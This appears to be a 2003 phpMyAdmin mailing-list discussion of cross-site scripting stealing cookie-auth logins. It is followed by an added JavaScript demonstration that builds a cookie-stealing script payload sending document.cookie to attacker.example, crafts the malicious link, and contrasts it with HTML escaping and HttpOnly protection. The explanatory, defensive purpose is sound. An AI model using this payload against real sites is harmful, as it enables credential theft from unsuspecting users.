On Wednesday 18 of June 2003 23:07, Garvin Hicking wrote:
Most actions need a valid 'session' to
execute cross-site scripting, which is not *that* serious.
Maybe even worse, you can include javascript that will read cookies with
login and password...
I don't know if I understand that correctly: You can only read your own
cookies with JavaScript, and you know that password already. Because when
others open a PMA page without a login, they only access their empty
cookie, right?
You know that somebody is using phpMyAdmin with cookie auth (maybe also HTTP,
I'm not sure about JS possibilities in this way) on some URL, you make him
somehow click on a link you've created (it is not as hard as it seems for most
users), and you've got his login/password...
--
Regards
Michal Cihar
nijel at users dot sourceforge dot net
http://cihar.liten.cz
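The chain Michal sketches above (a page that reflects input unescaped, a crafted link the victim clicks, injected script reading document.cookie) as an added example. This is not phpMyAdmin code and not code from either poster; the page path, the `db` parameter, the cookie names and values, and the attacker host are all assumptions made up for the illustration. It puts the vulnerable rendering beside the output-encoded form, and models the one browser-side rule that matters for the cookie read: document.cookie only exposes cookies that were not set with HttpOnly.

```javascript
// Added example, not phpMyAdmin code. Everything below models the attack chain
// from the thread; URLs, parameter and cookie names are assumptions.

// Minimal HTML escaping for text placed into an HTML body or attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable page: echoes the query parameter straight into the HTML,
// so a <script> tag in the parameter runs in the victim's origin.
function renderVulnerable(queryParam) {
  return `<p>Database: ${queryParam}</p>`;
}

// Hardened page: same output with encoding applied; the tag becomes inert text.
function renderHardened(queryParam) {
  return `<p>Database: ${escapeHtml(queryParam)}</p>`;
}

// Payload the attacker embeds in the link: read document.cookie and ship it to
// a host they control by requesting an image from it. exfilUrl is assumed.
function stealerPayload(exfilUrl) {
  return `<script>new Image().src="${exfilUrl}?c="+encodeURIComponent(document.cookie)</script>`;
}

// The link the victim is tricked into clicking. pmaUrl and the 'db' parameter
// are assumptions about the target page, not phpMyAdmin specifics.
function craftedLink(pmaUrl, exfilUrl) {
  return `${pmaUrl}?db=${encodeURIComponent(stealerPayload(exfilUrl))}`;
}

// Recover the parameter the way the server would, to show what gets reflected.
function paramFromLink(link, name) {
  return new URL(link).searchParams.get(name);
}

// Model of what document.cookie shows to script: every cookie for the origin
// except those the browser set with HttpOnly, which it withholds from script.
function documentCookieView(jar) {
  return jar
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// Pull one cookie's value out of a document.cookie string, as the attacker's
// receiving endpoint would after the exfiltration request arrives.
function cookieValue(cookieString, name) {
  for (const part of cookieString.split("; ")) {
    const eq = part.indexOf("=");
    if (eq > 0 && part.slice(0, eq) === name) return part.slice(eq + 1);
  }
  return null;
}

// Walk through the chain with constructed values.
const link = craftedLink(
  "http://victim.example/phpmyadmin/index.php", // assumed target URL
  "http://attacker.example/log"                  // assumed attacker endpoint
);
const reflected = paramFromLink(link, "db");
console.log(renderVulnerable(reflected)); // script tag lands in the page verbatim
console.log(renderHardened(reflected));   // rendered as harmless text

// Constructed cookie jar for the victim's origin; names and values are made up.
const jar = [
  { name: "pma_auth", value: "bWFyYzpzM2NyM3Q=", httpOnly: false },
  { name: "PHPSESSID", value: "8f3a1c", httpOnly: true },
];
const visible = documentCookieView(jar);
console.log(visible);                          // only pma_auth is readable
console.log(cookieValue(visible, "pma_auth")); // what the attacker ends up with
console.log(cookieValue(visible, "PHPSESSID")); // null: HttpOnly kept it away
```

The point of the side by side is that the cookie theft is only possible because the reflected parameter reaches the page unencoded; with `renderHardened` the same link produces a page that displays the payload instead of running it, and with the credential cookie set HttpOnly even a successful injection cannot read it.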